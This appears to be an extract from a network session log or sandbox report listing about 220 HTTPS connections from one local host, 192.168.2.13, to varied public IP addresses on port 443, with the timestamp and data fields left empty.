                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18156192.168.2.1351012194.144.81.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18157192.168.2.1339278139.244.143.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18158192.168.2.134872218.25.187.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18159192.168.2.1345396191.116.62.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18160192.168.2.1350106138.210.203.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18161192.168.2.1353246193.83.108.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18162192.168.2.1340296140.176.242.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18163192.168.2.1347254110.7.37.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18164192.168.2.1358668217.235.255.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18165192.168.2.134226272.127.17.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18166192.168.2.135363698.151.154.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18167192.168.2.1352766122.59.52.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18168192.168.2.1333560201.24.222.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18169192.168.2.1358846190.198.109.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18170192.168.2.133343893.51.188.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18171192.168.2.1355042199.255.246.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18172192.168.2.1336852189.100.75.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18173192.168.2.1346968155.111.27.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18174192.168.2.1358206140.0.227.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18175192.168.2.133327078.195.98.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18176192.168.2.1335482131.247.102.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18177192.168.2.13435322.205.231.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18178192.168.2.1333272186.103.215.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18179192.168.2.1352188128.218.216.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18180192.168.2.1354798158.123.248.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18181192.168.2.135202691.121.101.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18182192.168.2.1345274140.130.21.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18183192.168.2.1360704178.201.73.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18184192.168.2.134092017.143.28.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18185192.168.2.133503441.58.73.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18186192.168.2.1356892116.136.75.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18187192.168.2.13438785.3.189.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18188192.168.2.1359958169.67.10.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18189192.168.2.135154666.115.219.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18190192.168.2.1345562190.238.113.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18191192.168.2.1354464177.23.247.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18192192.168.2.135978837.102.128.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18193192.168.2.135429673.110.144.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18194192.168.2.1337184122.225.254.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18195192.168.2.134734638.24.1.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18196192.168.2.135268289.228.117.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18197192.168.2.1346010122.219.224.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18198192.168.2.1342090180.202.136.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18199192.168.2.1335724167.145.127.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18200192.168.2.1350378128.23.16.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18201192.168.2.1350274187.129.113.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18202192.168.2.1346062198.194.75.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18203192.168.2.1356736184.176.3.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18204192.168.2.13452224.90.253.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18205192.168.2.1346786101.72.108.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18206192.168.2.1343402114.48.46.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18207192.168.2.133777425.22.35.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18208192.168.2.1360226210.178.169.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18209192.168.2.1340270152.40.42.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18210192.168.2.1336798134.137.28.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18211192.168.2.1360126128.248.253.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18212192.168.2.1342060123.138.209.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18213192.168.2.1343410164.120.194.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18214192.168.2.135229813.235.27.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18215192.168.2.133714214.26.230.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18216192.168.2.1360764179.58.70.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18217192.168.2.1336578191.132.232.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18218192.168.2.1354130206.73.49.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18219192.168.2.1356152113.69.184.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18220192.168.2.1347916168.21.146.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18221192.168.2.13494421.107.81.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18222192.168.2.133278274.142.21.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18223192.168.2.1358462117.80.196.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18224192.168.2.1339322113.144.36.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18225192.168.2.134592692.43.227.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18226192.168.2.1359832202.97.254.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18227192.168.2.1355512175.191.177.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18228192.168.2.1344596181.53.106.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18229192.168.2.13328089.84.142.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18230192.168.2.1336094207.31.189.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18231192.168.2.1354360108.230.97.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18232192.168.2.1343296205.245.198.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18233192.168.2.134604419.195.37.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18234192.168.2.135049419.125.20.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18235192.168.2.134706241.48.28.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18236192.168.2.133292241.78.145.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18237192.168.2.1336374138.159.121.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18238192.168.2.13423302.19.197.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18239192.168.2.1359522172.11.215.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18240192.168.2.135342647.32.157.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18241192.168.2.1342032109.6.25.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18242192.168.2.1353020141.174.90.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18243192.168.2.133460452.104.19.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18244192.168.2.1353328106.99.118.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18245192.168.2.13533649.174.215.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18246192.168.2.1352734208.99.225.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18247192.168.2.134422052.228.111.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18248192.168.2.1353674222.167.188.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18249192.168.2.135467678.29.239.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18250192.168.2.134701297.19.109.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18251192.168.2.1360136147.84.38.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18252192.168.2.133820250.74.9.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18253192.168.2.1343622199.148.19.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18254192.168.2.1337352101.5.99.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18255192.168.2.1352666194.188.4.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18256192.168.2.1350008207.123.178.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18257192.168.2.1349722190.36.221.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18258192.168.2.1355548173.172.41.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18259192.168.2.13579281.185.39.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18260192.168.2.134640097.195.188.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18261192.168.2.13449149.170.47.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18262192.168.2.134632224.37.89.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18263192.168.2.1345428163.75.222.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18264192.168.2.134455062.69.175.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18265192.168.2.135938023.122.214.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18266192.168.2.134108832.138.48.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18267192.168.2.1341576121.154.233.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18268192.168.2.1348570114.86.10.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18269192.168.2.1336036173.7.157.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18270192.168.2.134766867.103.201.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18271192.168.2.1354996140.124.206.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18272192.168.2.1333058159.1.22.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18273192.168.2.1341044119.209.38.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18274192.168.2.1350936124.96.99.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18275192.168.2.1338260123.9.195.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18276192.168.2.1338836189.50.29.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18277192.168.2.135081278.111.236.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18278192.168.2.133525079.80.74.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18279192.168.2.1343980125.117.60.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18280192.168.2.1347866115.182.138.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18281192.168.2.1333546111.49.255.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18282192.168.2.135256481.114.147.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18283192.168.2.1360094195.229.169.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18284192.168.2.1357896175.175.196.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18285192.168.2.134628236.249.140.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18286192.168.2.1342252186.24.187.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18287192.168.2.13585709.172.8.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18288192.168.2.1337420108.58.232.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18289192.168.2.1356706198.103.28.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18290192.168.2.1343858107.128.247.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18291192.168.2.133594231.102.218.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18292192.168.2.1345904136.232.98.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18293192.168.2.133544070.47.56.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18294192.168.2.1342710198.239.184.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18295192.168.2.1351494157.3.239.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18296192.168.2.13480549.128.77.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18297192.168.2.1334744176.168.61.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18298192.168.2.133977831.200.80.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18299192.168.2.1344894220.94.34.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18300192.168.2.135976664.140.86.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18301192.168.2.1352948185.83.132.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18302192.168.2.1336462196.192.180.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18303192.168.2.1335026110.51.14.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18304192.168.2.1352618144.48.72.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18305192.168.2.134120637.22.87.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18306192.168.2.134593262.80.121.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18307192.168.2.1343962100.188.121.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18308192.168.2.1336962144.31.191.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18309192.168.2.1335078128.19.224.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18310192.168.2.136041637.250.252.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18311192.168.2.1349778134.115.219.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18312192.168.2.13461208.236.65.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18313192.168.2.1334834165.22.176.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18314192.168.2.1352562157.55.172.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18315192.168.2.135280279.178.227.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18316192.168.2.134081625.40.89.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18317192.168.2.1346810135.221.254.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18318192.168.2.134855023.124.79.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18319192.168.2.1337812158.246.199.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18320192.168.2.135022093.17.174.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18321192.168.2.135950876.220.223.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18322192.168.2.1340178141.5.211.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18323192.168.2.1344758117.218.227.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18324192.168.2.1345778172.203.182.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18325192.168.2.1347510123.117.246.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18326192.168.2.134531053.103.134.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18327192.168.2.1354764184.61.156.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18328192.168.2.1340636211.102.31.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18329192.168.2.1339698179.107.94.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18330192.168.2.135147250.178.231.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18331192.168.2.1345994218.51.14.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18332192.168.2.1342264144.225.116.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18333192.168.2.1344950178.83.85.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18334192.168.2.1338652167.76.144.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18335192.168.2.1353210152.234.32.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18336192.168.2.1332890206.10.137.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18337192.168.2.1335240104.97.49.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18338192.168.2.1358714101.165.36.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18339192.168.2.1351358171.249.129.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18340192.168.2.1339422221.212.239.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18341192.168.2.135616644.91.14.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18342192.168.2.1360412148.104.139.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18343192.168.2.1338548106.161.209.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18344192.168.2.1342780194.141.20.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18345192.168.2.1353034155.144.72.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18346192.168.2.1347942186.168.64.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18347192.168.2.135132048.160.200.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18348192.168.2.1342530126.229.135.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18349192.168.2.1352746153.85.212.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18350192.168.2.1344224195.208.61.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18351192.168.2.1334204109.133.141.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18352192.168.2.1360702220.186.141.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18353192.168.2.1346096156.189.192.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18354192.168.2.135024889.125.190.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18355192.168.2.135114079.250.242.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18356192.168.2.1353962216.77.209.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18357192.168.2.134066895.110.184.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18358192.168.2.1345950103.222.35.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18359192.168.2.1357992100.219.81.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18360192.168.2.1347960203.156.193.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18361192.168.2.134343479.201.96.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18362192.168.2.134443661.227.140.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18363192.168.2.1346738100.29.5.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18364192.168.2.13554062.196.253.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18365192.168.2.1333662192.227.240.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18366192.168.2.1344972159.7.59.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18367192.168.2.1359290156.31.223.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18368192.168.2.1346112221.212.108.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18369192.168.2.1355092196.61.172.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18370192.168.2.1358478182.157.161.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18371192.168.2.135831077.96.95.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18372192.168.2.134358443.58.207.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18373192.168.2.1357934103.52.241.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18374192.168.2.1339372156.218.25.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18375192.168.2.13349724.80.147.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        18376192.168.2.1336286142.24.71.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
